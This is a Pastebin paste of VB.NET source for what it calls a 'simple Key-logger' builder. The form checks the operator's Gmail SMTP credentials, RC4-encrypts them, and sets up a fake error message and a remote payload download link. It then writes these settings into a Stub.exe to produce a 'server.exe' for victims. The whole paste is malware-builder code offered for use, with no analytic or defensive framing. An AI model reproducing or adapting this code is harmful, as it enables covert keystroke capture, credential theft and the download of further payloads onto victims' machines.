Guest User

Untitled

a guest
Apr 27th, 2018
248
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.18 KB | None | 0 0
  1. Imports System.Net.Mail
  2. Imports System.IO
  3. Public Class Form1
  4. Dim stub, User, Pass, key, dlkey, dlink, faketitle, fakemsg, cb1, cb2, cb3, cb4, cb5, cb6 As String
  5. Const FileSplit = "@D4rkn3s5@"
  6. Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
  7. If CheckBox1.Checked = True Then
  8. User = rc4(TextBox1.Text, Encryptmail.TextBox1.Text)
  9. Pass = rc4(TextBox2.Text, Encryptmail.TextBox1.Text)
  10. Try
  11. Dim Mail As New MailMessage
  12. Mail.To.Add(TextBox1.Text)
  13. Mail.From = New MailAddress(TextBox1.Text)
  14. Mail.Subject = "Test Mail"
  15. Mail.Body = " This is a test email from l33thackers.com simple Key-logger. This message is being sent to ensure you have provided the correct details for your account."
  16. Dim SMTP As New SmtpClient("smtp.gmail.com")
  17. SMTP.Port = 587
  18. SMTP.EnableSsl = True
  19. SMTP.Credentials = New System.Net.NetworkCredential(rc4(User, Encryptmail.TextBox1.Text), rc4(Pass, Encryptmail.TextBox1.Text))
  20. SMTP.Send(Mail)
  21. MsgBox("E-mail address is vaild and works perfect.", MsgBoxStyle.Information, "Works perfect")
  22. Button2.Enabled = True
  23. Catch ex As Exception
  24. MsgBox("Error, invaild e-mail address username and/or password.", MsgBoxStyle.Critical, "Error")
  25. Button2.Enabled = False
  26. End Try
  27. Else
  28. Try
  29. Dim Mail As New MailMessage
  30. Mail.To.Add(TextBox1.Text)
  31. Mail.From = New MailAddress(TextBox1.Text)
  32. Mail.Subject = "Test Mail"
  33. Mail.Body = " This is a test email from l33thackers.com simple Key-logger. This message is being sent to ensure you have provided the correct details for your account."
  34. Dim SMTP As New SmtpClient("smtp.gmail.com")
  35. SMTP.Port = 587
  36. SMTP.EnableSsl = True
  37. SMTP.Credentials = New System.Net.NetworkCredential(TextBox1.Text, TextBox2.Text)
  38. SMTP.Send(Mail)
  39. MsgBox("E-mail address is vaild and works perfect.", MsgBoxStyle.Information, "Works perfect")
  40. Button2.Enabled = True
  41. Catch ex As Exception
  42. MsgBox("Error, invaild e-mail address username and/or password.", MsgBoxStyle.Critical, "Error")
  43. Button2.Enabled = False
  44. End Try
  45. End If
  46. End Sub
  47.  
  48. Private Sub CheckBox1_CheckedChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles CheckBox1.CheckedChanged
  49. If CheckBox1.Checked = True Then
  50. Encryptmail.Show()
  51. End If
  52. End Sub
  53.  
  54. Private Sub CheckBox2_CheckedChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles CheckBox2.CheckedChanged
  55. If CheckBox2.Checked = True Then
  56. fake.Show()
  57. End If
  58. End Sub
  59.  
  60. Private Sub CheckBox5_CheckedChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles CheckBox5.CheckedChanged
  61. If CheckBox5.Checked = True Then
  62. dllink.Show()
  63. End If
  64. End Sub
  65.  
  66. Private Sub CheckBox6_CheckedChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles CheckBox6.CheckedChanged
  67. If CheckBox6.Checked = True Then
  68. dlencrypt.Show()
  69. End If
  70. End Sub
  71.  
  72. Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
  73. dlink = dllink.TextBox1.Text
  74. dlkey = dlencrypt.TextBox1.Text
  75. If CheckBox6.Checked = True Then
  76. dlink = rc4(dllink.TextBox1.Text, dlkey)
  77. My.Computer.Network.DownloadFile(rc4(dlink, dlkey), "C:\KFJD947DHC.exe")
  78. My.Computer.FileSystem.DeleteFile("C:\KFJD947DHC.exe")
  79. Else
  80. My.Computer.Network.DownloadFile(dlink, "C:\KFJD947DHC.exe")
  81. My.Computer.FileSystem.DeleteFile("C:\KFJD947DHC.exe")
  82. End If
  83. End Sub
  84.  
  85. Private Sub Button3_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button3.Click
  86. If CheckBox1.Checked = True Then
  87. cb1 = True
  88. key = Encryptmail.TextBox1.Text
  89. User = rc4(TextBox1.Text, key)
  90. Pass = rc4(TextBox2.Text, key)
  91. Else
  92. cb1 = False
  93. User = TextBox1.Text
  94. Pass = TextBox2.Text
  95. End If
  96. If CheckBox2.Checked = True Then
  97. cb2 = True
  98. faketitle = fake.TextBox1.Text
  99. fakemsg = fake.TextBox2.Text
  100. Else
  101. cb2 = False
  102. End If
  103. If CheckBox3.Checked = True Then
  104. cb3 = True
  105. Else
  106. cb3 = False
  107. End If
  108. If CheckBox4.Checked = True Then
  109. cb4 = True
  110. Else
  111. cb5 = False
  112. End If
  113. If CheckBox5.Checked = True Then
  114. cb5 = True
  115. dlink = dllink.TextBox1.Text
  116. Else
  117. cb5 = False
  118. End If
  119. If CheckBox6.Checked = True Then
  120. cb6 = True
  121. dlkey = dlencrypt.TextBox1.Text
  122. dlink = rc4(dllink.TextBox1.Text, dlkey)
  123. Else
  124. cb6 = False
  125. End If
  126.  
  127. FileOpen(1, Application.StartupPath & "\Stub.exe", OpenMode.Binary, OpenAccess.Read, OpenShare.Default)
  128. stub = Space(LOF(1))
  129. FileGet(1, stub)
  130. FileClose(1)
  131.  
  132. If File.Exists("/Server.exe") Then
  133. My.Computer.FileSystem.DeleteFile("/Server.exe")
  134. End If
  135.  
  136. FileOpen(2, Application.StartupPath & "\server.exe", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default)
  137. FilePut(2, stub & FileSplit & User & FileSplit & Pass & FileSplit & key & FileSplit & dlink & FileSplit & dlkey & FileSplit & faketitle & FileSplit & fakemsg & FileSplit & cb1 & FileSplit & cb2 & FileSplit & cb3 & FileSplit & cb4 & FileSplit & cb5 & FileSplit & cb6)
  138. FileClose(2)
  139. MsgBox("Server.exe has been built successfully", MsgBoxStyle.Information, "Success")
  140.  
  141. End Sub
  142. End Class
Add Comment
Please, Sign In to add comment